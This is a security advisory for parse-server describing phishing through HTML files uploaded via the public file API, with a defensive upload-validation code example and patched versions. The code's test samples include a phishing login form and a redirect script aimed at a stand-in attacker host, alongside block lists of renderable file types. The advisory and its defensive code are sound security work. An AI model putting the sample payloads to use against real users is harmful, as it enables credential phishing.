Description
Phishing attack vulnerability via malicious file upload. A malicious user could upload an HTML file to Parse Server through its public file API. The uploaded file is then served from the same internet domain as the Parse Server deployment, so a link to it appears to belong to the legitimate application. The URL of the uploaded HTML could be shared in phishing campaigns, with the target seeing a trusted domain in the address bar.
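What a deployment-side gate against this class of upload looks like, as an added example; this is not code from Parse Server or from this advisory, and the patched releases' own mitigation may differ (check the Parse Server release notes). It assumes a Node.js runtime; every name in it (`validateUpload`, `extensionOf`, `looksLikeMarkup`, `BLOCKED_EXTENSIONS`, `runSamples`) is the example's own, and the sample uploads are constructed, not captured traffic. It goes a step beyond the advisory's HTML case by also refusing other document types a browser will render in the site's origin (SVG, XML) and by sniffing the leading bytes the way a browser would when the declared type is missing or generic.

```javascript
// Added example, not Parse Server's own code: an upload gate in the spirit
// of the fix. All names here are this example's own.

// Extensions a browser will render as a document (and so can carry a
// phishing page or script) when served from the application's own origin.
const BLOCKED_EXTENSIONS = new Set([
  'html', 'htm', 'xhtml', 'xht', 'shtml', 'phtml',
  'svg', 'xml', 'xsl', 'xslt', 'mht', 'mhtml',
]);

// Declared content types that make a browser treat the response as markup.
const BLOCKED_CONTENT_TYPES = [
  /^text\/html\b/i, /^application\/xhtml\+xml\b/i,
  /^image\/svg\+xml\b/i, /^text\/xml\b/i, /^application\/xml\b/i,
];

// Leading-bytes check modelled on the tag table of the WHATWG MIME sniffing
// algorithm: a body that starts (after whitespace) with one of these tags is
// what a browser promotes to text/html when the type is missing or generic.
const MARKUP_START =
  /^<(?:!doctype\s+html|html|head|script|iframe|h1|div|font|table|a|style|title|b|body|br|p)[\s>]|^<!--|^<\?xml/;

// Lower-cased extension of the last path segment, '' when there is none.
function extensionOf(filename) {
  const base = String(filename).split(/[\\/]/).pop();
  const dot = base.lastIndexOf('.');
  return dot < 0 ? '' : base.slice(dot + 1).toLowerCase();
}

// True when the first KiB of the body sniffs as markup.
// Accepts a Buffer, a Uint8Array or a string.
function looksLikeMarkup(bytes) {
  const buf = Buffer.isBuffer(bytes) ? bytes : Buffer.from(bytes);
  const head = buf.subarray(0, 1024).toString('latin1')
    .replace(/^\xEF\xBB\xBF/, '') // UTF-8 BOM as it appears through latin1
    .trimStart()
    .toLowerCase();
  return MARKUP_START.test(head);
}

// Decide whether an upload may be stored. Returns { ok, reason } so the
// caller can log the reason and raise its own error type.
function validateUpload({ filename, contentType = '', bytes }) {
  const ext = extensionOf(filename);
  if (BLOCKED_EXTENSIONS.has(ext)) {
    return { ok: false, reason: `blocked extension .${ext}` };
  }
  if (BLOCKED_CONTENT_TYPES.some((re) => re.test(contentType))) {
    return { ok: false, reason: `blocked content type ${contentType}` };
  }
  if (looksLikeMarkup(bytes)) {
    return { ok: false, reason: 'body sniffs as markup' };
  }
  return { ok: true, reason: 'accepted' };
}

// Constructed sample uploads (not real traffic) exercising the three gates:
// a plain phishing page, a page hidden behind an image name and type, and a
// genuine PNG header that must pass.
const SAMPLES = [
  { filename: 'login.html', contentType: 'text/html',
    bytes: '<html><form action="https://attacker.invalid">...</form></html>' },
  { filename: 'photo.png', contentType: 'image/png',
    bytes: '\n  <!DOCTYPE html><script>location="https://attacker.invalid"</script>' },
  { filename: 'photo.png', contentType: 'image/png',
    bytes: Buffer.from([0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a]) },
];

function runSamples() {
  return SAMPLES.map((s) => ({ filename: s.filename, ...validateUpload(s) }));
}

for (const r of runSamples()) {
  console.log(`${r.filename}: ${r.ok ? 'accept' : 'reject'} (${r.reason})`);
}
```

In a Parse Server deployment the natural place for such a check is a Cloud Code `beforeSaveFile` trigger that throws when `ok` is false (reading the file's bytes inside the trigger is left to the reader, since the `Parse.File` API for that has varied across versions). The check reduces the attack surface but does not remove it: whatever is accepted, user uploads are best served from a separate origin from the application and with `X-Content-Type-Options: nosniff` and `Content-Disposition: attachment`, so that a file which slips through is neither rendered in the application's origin nor sniffed into a document.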
Recommendation
Update the parse-server package to the latest compatible version. Version details:
Affected version(s): **>= 6.0.0, < 6.1.1** and **< 5.4.4**. Patched version(s): **6.1.1** and **5.4.4**.
Related Issues
- Parse Server allows public `explain` queries which may expose sensitive database performance information and schema deta - CVE-2025-64502
- angular vulnerable to super-linear runtime due to backtracking - CVE-2024-21490
- Parse Server before v3.4.1 vulnerable to Denial of Service - CVE-2019-1020012
- Happy DOM: VM Context Escape can lead to Remote Code Execution - CVE-2025-61927
Tags:
- npm
- parse-server
Last updated on November 05, 2023